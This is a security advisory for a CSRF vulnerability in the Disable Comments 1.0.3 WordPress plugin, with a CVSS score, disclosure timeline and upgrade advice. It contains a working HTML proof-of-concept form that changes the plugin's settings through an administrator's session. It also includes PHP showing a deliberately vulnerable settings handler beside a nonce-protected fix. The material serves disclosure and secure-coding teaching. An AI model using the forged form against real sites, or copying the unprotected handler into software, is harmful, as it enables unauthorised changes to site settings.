Advisory:

CSRF in Disable Comments 1.0.3

Vulnerability

Last revised:

A CSRF vulnerability allows an unauthenticated attacker to change the plugin's settings (enabling or disabling comments across post types) with a logged-in administrator's privileges, if that administrator visits a page of the attacker's choosing (for instance via a spear-phishing link). The proof of concept below shows the settings POST being accepted without any token tying it to the admin's session.

Current state: Fixed

CVSS Summary

CVSS (v2) base scores for this vulnerability
Score: 5.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:P
  Access Vector: Network
  Access Complexity: Medium
  Authentication: None
  Confidentiality Impact: None
  Integrity Impact: Partial
  Availability Impact: Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Submitting this form (hosted on a site the attacker controls) while logged in to the target as an administrator selects the "selected post types" mode with no types ticked, which re-enables comments on all post types. localhost stands in for the target site.

<form action="http://localhost/wp-admin/options-general.php?page=disable_comments_settings" method="POST">
  <!-- "selected_types" mode with no post types ticked: nothing is disabled -->
  <input type="radio" name="mode" value="selected_types" checked>
  <input type="checkbox" name="disabled_types[]" value="post">
  <input type="checkbox" name="disabled_types[]" value="page">
  <input type="checkbox" name="disabled_types[]" value="attachment">
  <!-- no nonce field: nothing in this request is bound to the admin's session -->
  <input type="submit" name="submit">
</form>
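For reference, the shape of the missing check. The following is an added example, not code from the Disable Comments plugin or from its fix: a minimal WordPress settings handler, first in the CSRF-prone form the advisory describes and then protected with a WordPress nonce. The option name, nonce action, page slug and all function names are assumptions chosen for illustration.

```php
<?php
// Added example (not the Disable Comments plugin's own code). Option name,
// nonce action, page slug and function names are assumptions for illustration.

const DC_EXAMPLE_OPTION       = 'dc_example_settings';
const DC_EXAMPLE_NONCE_ACTION = 'dc_example_save_settings';
const DC_EXAMPLE_NONCE_FIELD  = '_dc_example_nonce';

// Vulnerable shape: any POST that reaches this page while an admin is logged
// in is applied, so a form on an attacker's site succeeds. The capability
// check does not help: the victim really is an admin, and the browser attaches
// their session cookies to the forged request automatically.
function dc_example_handle_settings_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    if ( isset( $_POST['submit'] ) ) {
        dc_example_save_from_post();
    }
}

// Hardened shape: the form carries a nonce tied to the logged-in user and the
// action, and the handler refuses requests that lack a valid one. A third-party
// page cannot read the nonce, so the forged POST never reaches update_option().
function dc_example_handle_settings_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    if ( isset( $_POST['submit'] ) ) {
        // check_admin_referer() calls wp_die() when the nonce is missing or invalid.
        check_admin_referer( DC_EXAMPLE_NONCE_ACTION, DC_EXAMPLE_NONCE_FIELD );
        dc_example_save_from_post();
    }
}

// Shared save logic: whitelist the mode and the post types before storing.
function dc_example_save_from_post() {
    $mode     = isset( $_POST['mode'] ) ? sanitize_key( wp_unslash( $_POST['mode'] ) ) : '';
    $disabled = ( isset( $_POST['disabled_types'] ) && is_array( $_POST['disabled_types'] ) )
        ? array_map( 'sanitize_key', wp_unslash( $_POST['disabled_types'] ) )
        : array();

    $known_types = array_keys( get_post_types( array( 'public' => true ), 'names' ) );
    $settings    = array(
        'remove_everywhere' => ( 'remove_everywhere' === $mode ),
        'disabled_types'    => array_values( array_intersect( $disabled, $known_types ) ),
    );
    update_option( DC_EXAMPLE_OPTION, $settings );
}

// Rendering the hardened form: wp_nonce_field() emits the hidden nonce input
// (plus a _wp_http_referer field) that check_admin_referer() validates.
function dc_example_render_form() {
    $types = get_post_types( array( 'public' => true ), 'objects' );
    ?>
    <form action="<?php echo esc_url( admin_url( 'options-general.php?page=dc_example_settings' ) ); ?>" method="post">
        <?php wp_nonce_field( DC_EXAMPLE_NONCE_ACTION, DC_EXAMPLE_NONCE_FIELD ); ?>
        <label><input type="radio" name="mode" value="remove_everywhere"> Everywhere</label>
        <label><input type="radio" name="mode" value="selected_types" checked> On selected post types:</label>
        <?php foreach ( $types as $type ) : ?>
            <label>
                <input type="checkbox" name="disabled_types[]" value="<?php echo esc_attr( $type->name ); ?>">
                <?php echo esc_html( $type->labels->name ); ?>
            </label>
        <?php endforeach; ?>
        <?php submit_button(); // renders the button with name="submit" ?>
    </form>
    <?php
}
```

The nonce is generated per user and per action and only appears in pages the site itself serves, so the attacker's cross-site form cannot include a valid one and check_admin_referer() stops the forged request before the option is written. The capability check alone is not a CSRF defence, since the request genuinely comes from an administrator's browser.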

Advisory timeline

  • 2014-03-04: Discovered
  • 2014-03-17: Reported to plugins@wordpress.org. CVE requested.
  • 2014-03-31: No response, so re-reported directly to author. Publication clock restarted.
  • 2014-04-01: Author reports issue fixed.

Mitigation/further actions

Update to version 1.0.4 immediately.